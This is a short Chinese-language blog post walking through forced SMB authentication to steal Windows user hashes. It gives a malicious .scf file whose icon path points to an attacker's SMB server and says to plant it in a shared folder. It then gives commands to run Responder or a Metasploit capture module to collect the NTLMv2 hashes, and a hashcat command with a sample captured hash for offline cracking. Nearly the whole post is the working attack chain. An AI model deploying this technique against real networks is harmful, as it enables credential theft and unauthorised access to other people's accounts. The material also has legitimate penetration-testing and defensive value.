利用強制smb身份驗證獲取用戶哈希
VSole2021-11-07 05:47:54
前言
攻擊者可通過向共享目錄投遞連接外部服務器的資源文件,用戶請求過程中嘗試身份驗證,會默認使用SMB協議將用戶哈希發送到服務器,這樣攻擊者就會獲取對方用戶賬戶哈希。
創建共享目錄scf文件
[Shell] Command=2 IconFile=\\X.X.X.X\share\1.ico [Taskbar] Command=ToggleDesktop
重命名后綴為.scf,保存在共享目錄
使用responder接收哈希
使用responder開啟監聽
git clone https://github.com/lgandx/Responder.git python Responder.py -wrf --lm -v -I eth0
使用任一用戶訪問剛才建立好的共享目錄,只要進入到保存有.scf這一文件的層級就會觸發smb身份驗證,responder會監聽到NTLMv2哈希

使用msf模塊接收哈希
use auxiliary/server/capture/smb run
使用hashcat配合字典來破解
hashcat -m 5600 Administrator::NEXT:b36ff0a87f24a5b2:59D4E07C55717C42B167E2FF178C0B83:01010000000000005D83AE7CFE67D701B33B25F625134A1E00000000020000000000000000000000 /root/pass.txt --force

VSole
網絡安全專家